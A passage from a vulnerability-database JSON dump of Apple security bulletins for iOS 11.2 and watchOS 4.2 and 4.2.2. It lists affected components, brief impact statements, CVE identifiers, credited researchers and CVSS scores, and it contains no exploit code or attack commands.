memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOMobileFrameBuffer**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13879: Apple\n\nEntry updated October 24, 2018\n\n**IOSurface**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**Mail**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Incorrect certificate is used for encryption\n\nDescription: A S/MIME issue existed in the handling of encrypted email. This issue was addressed through improved selection of the encryption certificate.\n\nCVE-2017-13874: Nicolas Devillard\n\nEntry updated April 9, 2018\n\n**Mail Drafts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\n**Mail Message Framework**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com)\n\nEntry added December 21, 2017\n\n**ReplayKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A user may not have control over their screen broadcast\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13888: Dan Niemeyer of Microsoft, Peter Pau (ArcanaArt.com)\n\nEntry added June 21, 2018, updated September 8, 2020\n\n**SafariViewController**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-13891: Janne Raiskila (@raiskila)\n\nEntry added June 21, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 13, 2017, updated May 4, 2018\n\n**Wi-Fi**\n\nAvailable for: iPhone 6s, iPhone 6s Plus, iPhone 6, iPhone 6 Plus, iPhone SE, iPhone 5s, 12.9-inch iPad Pro 1st generation, iPad Air 2, iPad Air, iPad 5th generation, iPad mini 4, iPad mini 3, iPad mini 2, and iPod touch 6th generation \nReleased for iPhone 7 and later and iPad Pro 9.7-inch (early 2016) and later in [iOS 11.1](<https://support.apple.com/kb/HT208222>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and Abhinash Jain (@abhinashjain) researcher for their assistance.\n\nEntry added February 14, 2018, updated April 9, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: September 08, 2020\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-02T00:00:00", "type": "apple", "title": "About the security content of iOS 11.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13847", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13860", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13874", "CVE-2017-13876", "CVE-2017-13879", "CVE-2017-13880", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-13888", "CVE-2017-13891", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-2411", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7152", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162", "CVE-2017-7164", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2017-12-02T00:00:00", "id": "APPLE:3CD8680715FC8DF4A758CC6012471868", "href": "https://support.apple.com/kb/HT208334", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:27", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 4.2\n\nReleased December 5, 2017\n\n**Auto Unlock**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added January 10, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple Watch (1st Generation) and Apple Watch Series 3 \nReleased for Apple Watch Series 1 and Apple Watch Series 2 in [watchOS 4.1](<https://support.apple.com/kb/HT208220>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n\n\n## No impact\n\nwatchOS 4.2 is not impacted by the following issue: \n\n**Kernel**\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-18T06:10:21", "title": "About the security content of watchOS 4.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13869", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-13880", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13904", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-13884", "CVE-2017-13867", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13862"], "modified": "2018-10-18T06:10:21", "id": "APPLE:HT208325", "href": "https://support.apple.com/kb/HT208325", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:38", "description": "# About the security content of watchOS 4.2\n\nThis document describes the security content of watchOS 4.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 4.2\n\nReleased December 5, 2017\n\n**Auto Unlock**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added January 10, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple Watch (1st Generation) and Apple Watch Series 3 \nReleased for Apple Watch Series 1 and Apple Watch Series 2 in [watchOS 4.1](<https://support.apple.com/kb/HT208220>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n\n\n## No impact\n\nwatchOS 4.2 is not impacted by the following issue: \n\n**Kernel**\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 18, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-05T00:00:00", "type": "apple", "title": "About the security content of watchOS 4.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13855", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13876", "CVE-2017-13880", "CVE-2017-13884", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7162", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2017-12-05T00:00:00", "id": "APPLE:121C0C2C932F899F870D9D5665610ED0", "href": "https://support.apple.com/kb/HT208325", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:32", "description": "# About the security content of watchOS 4.2.2\n\nThis document describes the security content of watchOS 4.2.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 4.2.2\n\nReleased January 23, 2018\n\n**Audio**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4094: Mingi Cho, Seoyoung Kim, Young-Ho Lee, MinSik Shin and Taekyoung Kwon of the Information Security Lab, Yonsei University\n\nEntry added November 16, 2018\n\n**Core Bluetooth**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4087: Rani Idan (@raniXCH) of Zimperium zLabs Team\n\nCVE-2018-4095: Rani Idan (@raniXCH) of Zimperium zLabs Team\n\n**Graphics Driver**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4109: Adam Donenfeld (@doadam) of the Zimperium zLabs Team\n\nEntry added February 8, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2018-4090: Jann Horn of Google Project Zero\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4092: Stefan Esser of Antid0te UG\n\nEntry updated November 16, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4082: Russ Cox of Google\n\nEntry updated November 16, 